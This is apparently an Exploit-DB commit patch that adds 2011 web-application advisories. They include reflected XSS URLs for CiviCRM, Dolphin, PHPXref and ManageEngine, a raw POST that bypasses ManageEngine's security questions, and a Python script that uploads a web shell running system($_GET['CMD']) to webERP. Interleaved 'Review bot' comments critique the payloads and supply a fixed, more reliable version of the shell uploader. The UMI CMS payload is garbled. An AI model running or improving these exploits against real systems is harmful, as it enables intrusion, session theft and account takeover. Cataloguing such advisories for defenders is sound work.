From 430fa482490eec39e262e526ea4400041ec8764a Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 24 Nov 2014 04:47:19 +0000
Subject: [PATCH] Updated 11_24_2014

---
 files.csv | 9 ++++-
 platforms/php/webapps/35327.txt | 28 +++++++++++++++
 platforms/php/webapps/35328.txt | 47 +++++++++++++++++++++++++
 platforms/php/webapps/35329.txt | 9 +++++
 platforms/php/webapps/35330.txt | 24 +++++++++++++
 platforms/php/webapps/35331.txt | 9 +++++
 platforms/php/webapps/35332.txt | 10 ++++++
 platforms/php/webapps/35333.py | 61 +++++++++++++++++++++++++++++++++
 8 files changed, 196 insertions(+), 1 deletion(-)
 create mode 100755 platforms/php/webapps/35327.txt
 create mode 100755 platforms/php/webapps/35328.txt
 create mode 100755 platforms/php/webapps/35329.txt
 create mode 100755 platforms/php/webapps/35330.txt
 create mode 100755 platforms/php/webapps/35331.txt
 create mode 100755 platforms/php/webapps/35332.txt
 create mode 100755 platforms/php/webapps/35333.py

diff --git a/files.csv b/files.csv
index 2dff0d020..1d9f6da17 100755
--- a/files.csv
+++ b/files.csv
@@ -18183,7 +18183,7 @@ id,file,description,date,author,platform,type,port
 20912,platforms/windows/remote/20912.txt,"Trend Micro InterScan VirusWall for Windows NT 3.51 Configurations Modification Vulnerability",2001-06-12,"SNS Advisory",windows,remote,0
 20913,platforms/php/webapps/20913.txt,"Disqus Blog Comments Blind SQL Injection Vulnerability",2012-08-29,Spy_w4r3,php,webapps,0
 20914,platforms/cgi/remote/20914.pl,"cgiCentral WebStore 400 Administrator Authentication Bypass Vulnerability",2001-05-06,"Igor Dobrovitski",cgi,remote,0
-20915,platforms/windows/local/20915.py,"ActFax 4.31 Local Privilege Escalation Exploit",2012-08-29,"Craig Freyman",windows,local,0
+20915,platforms/windows/local/20915.py,"ActFax 4.31 - Local Privilege Escalation Exploit",2012-08-29,"Craig Freyman",windows,local,0
 20916,platforms/cgi/remote/20916.pl,"cgiCentral WebStore 400 Arbitrary Command Execution Vulnerability",2001-05-06,"Igor Dobrovitski",cgi,remote,0
 20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system SEH 0verwrite Vulnerability",2012-08-29,Ciph3r,windows,dos,0
 20918,platforms/php/webapps/20918.txt,"Wordpress HD Webplayer 1.1 - SQL Injection Vulnerability",2012-08-29,JoinSe7en,php,webapps,0
@@ -31817,3 +31817,10 @@ id,file,description,date,author,platform,type,port
 35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0
 35323,platforms/php/webapps/35323.md,"MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability",2014-11-22,"Taoguang Chen",php,webapps,0
 35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0
+35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0
+35328,platforms/php/webapps/35328.txt,"UMI CMS 2.8.1.2 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0
+35329,platforms/php/webapps/35329.txt,"PHPXref 0.7 'nav.html' Cross Site Scripting Vulnerability",2011-02-09,MustLive,php,webapps,0
+35330,platforms/php/webapps/35330.txt,"ManageEngine ADSelfService Plus 4.4 POST Request Manipulation Security Question Weakness",2011-02-10,"Core Security",php,webapps,0
+35331,platforms/php/webapps/35331.txt,"ManageEngine ADSelfService Plus 4.4 EmployeeSearch.cc Multiple Parameter XSS",2011-02-10,"Core Security",php,webapps,0
+35332,platforms/php/webapps/35332.txt,"Dolphin 7.0.4 Multiple Cross Site Scripting Vulnerabilities",2011-02-10,"AutoSec Tools",php,webapps,0
+35333,platforms/php/webapps/35333.py,"webERP 4.0.1 'InputSerialItemsFile.php' Arbitrary File Upload Vulnerability",2011-02-10,"AutoSec Tools",php,webapps,0
diff --git a/platforms/php/webapps/35327.txt b/platforms/php/webapps/35327.txt
new file mode 100755
index 000000000..b6049a99a
--- /dev/null
+++ b/platforms/php/webapps/35327.txt
@@ -0,0 +1,28 @@
+source: http://www.securityfocus.com/bid/46275/info
+
+CiviCRM is prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+CiviCRM 3.3.3. is vulnerable; prior versions may also be affected.
+
+Drupal:
+
+http://www.example.com/drupal-6.20/sites/all/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?defaultPath=%3Cscript%3Ealert(0)%3C/script%3E
+
+http://www.example.com/drupal-6.20/sites/all/modules/civicrm/packages/amfphp/browser/code.php?class=%3Cscript%3Ealert(0)%3C/script%3E
+
+http://www.example.com/drupal-6.20/sites/all/modules/civicrm/packages/amfphp/browser/details.php?class=
+
+http://www.example.com/drupal-6.20/sites/all/modules/civicrm/packages/amfphp/browser/methodTable.php?class=%3Cscript%3Ealert(0)%3C/script%3E
+
+
+Joomla:
+
+http://www.example.com/joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?defaultPath=%3Cscript%3Ealert(0)%3C/script%3E
+
+http://www.example.com/joomla/administrator/components/com_civicrm/civicrm/packages/amfphp/browser/methodTable.php?class=%3Cscript%3Ealert(0)%3C/script%3E
+
+http://www.example.com/joomla/administrator/components/com_civicrm/civicrm/packages/PHPgettext/examples/pigs_dropin.php?lang=0%3Cscript%3Ealert(0)%3C/script%3E
+
+http://www.example.com/joomla/administrator/components/com_civicrm/civicrm/packages/PHPgettext/examples/pigs_fallback.php?lang=%3Cscript%3Ealert(0)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/35328.txt b/platforms/php/webapps/35328.txt
new file mode 100755
index 000000000..f5b4298a1
--- /dev/null
+++ b/platforms/php/webapps/35328.txt
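Review bot: The third Drupal URL, `details.php?class=`, carries no payload as committed, so it demonstrates nothing; the `<script>` payload was presumably lost because it was written unencoded rather than as `%3Cscript%3Ealert(0)%3C/script%3E` like every other entry, and it should be restored in encoded form or the line dropped. Every Joomla vector sits under `administrator/components/com_civicrm/`, the back-end component tree, so those likely require an authenticated administrator as the victim; the advisory should say so, since it changes the severity. All affected scripts are bundled third-party packages visible in the paths (OpenFlashChart's `ofc_upload_image.php`, the amfphp `browser/` service browser, the PHPgettext `examples/` directory), so the practical mitigation for operators is to remove or deny web access to those example and browser files rather than wait only for a CiviCRM release — that is inferred from the paths, not stated in the advisory.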
@@ -0,0 +1,47 @@
+source: http://www.securityfocus.com/bid/46280/info
+
+UMI CMS is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+UMI CMS 2.8.1.2 is vulnerable; other versions may also be affected.
+
+
+ + +'> + + + + + + + + + +
+ + + + +
+ + + +'> + + + + + + + + + + +
+
\ No newline at end of file
diff --git a/platforms/php/webapps/35329.txt b/platforms/php/webapps/35329.txt
new file mode 100755
index 000000000..54c51ed92
--- /dev/null
+++ b/platforms/php/webapps/35329.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46302/info
+
+PHPXref is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and steal cookie-based authentication credentials.
+
+Versions prior to PHPXref 0.7 are vulnerable; other versions may also be affected.
+
+http://www.example.com/nav.html?javascript:alert(document.cookie)
\ No newline at end of file
diff --git a/platforms/php/webapps/35330.txt b/platforms/php/webapps/35330.txt
new file mode 100755
index 000000000..edda3caaa
--- /dev/null
+++ b/platforms/php/webapps/35330.txt
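Review bot: The affected-version line contradicts the index row this same commit adds to files.csv: the advisory says `Versions prior to PHPXref 0.7 are vulnerable`, while the CSV row is titled `PHPXref 0.7 'nav.html' Cross Site Scripting Vulnerability`, and readers use the title to decide whether 0.7 itself is affected, so one of the two should be corrected. The PoC `nav.html?javascript:alert(document.cookie)` passes the payload as the whole query string with no parameter name, which suggests `nav.html` reads `location.search` and uses it directly as a navigation target (a DOM-based `javascript:` scheme injection), but nav.html is not shown here so that is inferred; the advisory would be more actionable if it named the sink. Because the payload contains no angle brackets, a fix that only HTML-escapes the value would not help — the target must be rejected when it carries a scheme (or restricted to a relative path) before it is assigned to `location`/`href`.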
@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/46331/info
+
+ManageEngine ADSelfService Plus is prone to multiple vulnerabilities, including multiple security-bypass and cross-site scripting vulnerabilities.
+
+Attackers can exploit these issues to bypass certain security restrictions and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help them steal cookie-based authentication credentials and launch other attacks.
+
+ManageEngine ADSelfService Plus 4.4 is vulnerable; other versions may also be affected.
+
+POST /accounts/ValidateAnswers?methodToCall=validateAll HTTP/1.1
+
+Host: SERVER
+User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip,deflate
+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+Keep-Alive: 115
+Proxy-Connection: keep-alive
+Referer: http://www.example.com/accounts/ValidateUser
+Cookie: JSESSIONID=8F93EB242EF06C51BE93EB0CEDA69085
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 294
+
+loginId=1501&Hide_Captcha=0&POLICY_ID=1&Confirm_Answer=1&SESSION_EXPIRY_TIME=5&LOGIN_NAME=alice&REM_SESSION_TIME=00%3A40&bAns=11111&bQues=PreDefined-2&bAns=22222&bQues=PreDefined-3&bAns=33333&bQues=PreDefined-4&bAns=44444&bQues=PreDefined-5&quesList=4&DIGEST=qodpgd&next=Continue&DIS_ALL_QUES=1
\ No newline at end of file
diff --git a/platforms/php/webapps/35331.txt b/platforms/php/webapps/35331.txt
new file mode 100755
index 000000000..c85cfa2b4
--- /dev/null
+++ b/platforms/php/webapps/35331.txt
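Review bot: The request shows a manipulated POST but never says which field is being manipulated or what response proves success, so the PoC is hard to act on; the only candidates visible are the client-supplied control fields `Hide_Captcha=0`, `Confirm_Answer=1`, `DIS_ALL_QUES=1`, `quesList=4` and the repeated `bQues`/`bAns` pairs, and the advisory should name which of these the server trusts and what the observable effect is (e.g. answers accepted without matching the stored ones). The body is exactly 294 bytes as committed, so `Content-Length: 294` is correct, but anyone replaying it with a different `LOGIN_NAME` or answer values must recompute the header or the server will truncate or block on the read; a sentence saying so would save time. `Host: SERVER` is a placeholder while `Referer` uses `www.example.com`, which is fine for a PoC but should be consistent. Since `/accounts/ValidateAnswers` is the security-question step of a self-service reset flow, a bypass here is an account-takeover primitive rather than a mere "security-bypass" — that follows from the endpoint name, not from anything the text asserts.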
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46331/info
+
+ManageEngine ADSelfService Plus is prone to multiple vulnerabilities, including multiple security-bypass and cross-site scripting vulnerabilities.
+
+Attackers can exploit these issues to bypass certain security restrictions and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help them steal cookie-based authentication credentials and launch other attacks.
+
+ManageEngine ADSelfService Plus 4.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/EmployeeSearch.cc?actionId=showList&searchString=alice%22%20onmouseover=%22alert%28%27xss%27%29¶meterName=name&searchType=containshttp://www.example.com/EmployeeSearch.cc?actionId=Search¶meterName=name&searchType=contains&searchString=alice%22+onMouseOver%3D%22javascript%3Aalert%28%27xss%27%29
\ No newline at end of file
diff --git a/platforms/php/webapps/35332.txt b/platforms/php/webapps/35332.txt
new file mode 100755
index 000000000..4b84567d2
--- /dev/null
+++ b/platforms/php/webapps/35332.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/46337/info
+
+Dolphin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Dolphin 7.0.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/dolphin/explanation.php?explain=%3Cscript%3Ealert(0)%3C/script%3E
+http://www.example.com/dolphin/modules/boonex/custom_rss/post_mod_crss.php?relocate=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
\ No newline at end of file
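Review bot: The two PoC URLs on the last line are run together with no separator (`...&searchType=containshttp://www.example.com/...`), and the parameter name appears as `¶meterName` where `&parameterName` is evidently intended (the `&para` prefix was converted to the `¶` character, an HTML-entity artifact), so the line will not reproduce the issue when pasted as committed; it should be split into two lines with `&parameterName=name` restored in both. Both vectors reflect `searchString` unescaped inside a double-quoted attribute, which is what the `%22 onmouseover=%22` breakout shows, so the fix is attribute-context output encoding of that value (and of any other echoed parameters on the same page), not stripping of `<script>` tags. Whether `EmployeeSearch.cc` is reachable without a session is not stated and changes the severity; the advisory should say so.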
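Review bot: The `relocate` PoC uses a `%22%3E` prefix, which shows the value is echoed inside a double-quoted HTML attribute, but the advisory does not name the attribute; that matters because a parameter called `relocate` that lands in an `href` or `action` would also need its scheme validated, not only its quotes escaped — inferred from the name, not shown here. The `explanation.php?explain=` vector is a plain reflected `<script>` injection and is fixed by HTML-encoding `explain` on output. Neither URL states whether a session is required, which should be recorded since `post_mod_crss.php` sits under a module path whose name suggests a moderation action.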
diff --git a/platforms/php/webapps/35333.py b/platforms/php/webapps/35333.py
new file mode 100755
index 000000000..2996f924e
--- /dev/null
+++ b/platforms/php/webapps/35333.py
@@ -0,0 +1,61 @@ +source: http://www.securityfocus.com/bid/46341/info + +webERP is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input. + +An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. + +webERP 4.0.1 is vulnerable; other versions may also be affected. + +import socket + +host = 'localhost' +path = '/weberp' +shell_path = path + '/shell.php' +port = 80 + +def upload_shell(): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + s.settimeout(8) + + s.send('POST ' + path + '/includes/InputSerialItemsFile.php?LineNo=/../../../shell.php%00 HTTP/1.1\r\n' + 'Host: localhost\r\n' + 'Connection: keep-alive\r\n' + 'User-Agent: x\r\n' + 'Content-Length: 264\r\n' + 'Cache-Control: max-age=0\r\n' + 'Origin: null\r\n' + 'Content-Type: multipart/form-data; boundary=----x\r\n' + 'Accept: text/html\r\n' + 'Accept-Encoding: gzip,deflate,sdch\r\n' + 'Accept-Language: en-US,en;q=0.8\r\n' + 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n' + '\r\n' + '------x\r\n' + 'Content-Disposition: form-data; name="LineNo"\r\n' + '\r\n' + 'shell.php\r\n' + '------x\r\n' + 'Content-Disposition: form-data; name="ImportFile"; filename="shell.php"\r\n' + 'Content-Type: application/octet-stream\r\n' + '\r\n' + '\' + system($_GET[\'CMD\']) + \'\'; ?>\r\n' + '------x--\r\n' + '\r\n') + + resp = s.recv(8192) + + http_ok = 'HTTP/1.1 200 OK' + + if http_ok not in resp[:len(http_ok)]: + print 'error uploading shell' + return + else: print 'shell uploaded' + + s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\ + 'Host: ' + host + '\r\n\r\n') + + if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found' + else: print 'shell located at http://' + host + shell_path + +upload_shell()
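Review bot: `Content-Length: 264` and `Host: localhost` are hard-coded in the POST while `host`, `path` and the multipart body are variables, so the moment anyone changes the target or the payload the declared length is wrong and the server truncates or blocks on the body; build the body first, send `'Content-Length: ' + str(len(body))`, and use `'Host: ' + host` as the later GET already does. `s.send()` may write fewer bytes than requested and the socket is never closed on any path (including the early `return`), so `sendall()` plus a `try/finally: s.close()` is needed. Be explicit about what this leaves behind: the uploaded `shell.php` runs `system($_GET['CMD'])` for any unauthenticated caller and the script never removes it, so an engagement using it must delete the file afterwards (or gate it on a secret), and a note to that effect belongs in the advisory. The `LineNo=/../../../shell.php%00` traversal presumably depends on the target PHP truncating the path at the NUL byte, and the PHP one-liner as rendered here joins strings with `+` where PHP concatenates with `.`, which only works because `system()` writes its output directly; both assumptions should be stated so users know why the upload may silently fail elsewhere. `upload_shell()` starts and ends inside this hunk.

```python
def upload_shell():
    # … unchanged: socket creation, connect, settimeout …
    body = ('------x\r\n'
            'Content-Disposition: form-data; name="LineNo"\r\n'
            '\r\n'
            'shell.php\r\n'
            '------x\r\n'
            'Content-Disposition: form-data; name="ImportFile"; filename="shell.php"\r\n'
            'Content-Type: application/octet-stream\r\n'
            '\r\n'
            # … unchanged: the PHP one-liner …
            '------x--\r\n')
    try:
        s.sendall('POST ' + path + '/includes/InputSerialItemsFile.php?LineNo=/../../../shell.php%00 HTTP/1.1\r\n'
                  'Host: ' + host + '\r\n'
                  'Content-Length: ' + str(len(body)) + '\r\n'
                  # … unchanged: remaining request headers …
                  '\r\n' + body)
        resp = s.recv(8192)
        # … unchanged: 200 OK check and GET of shell_path, using sendall …
    finally:
        s.close()
```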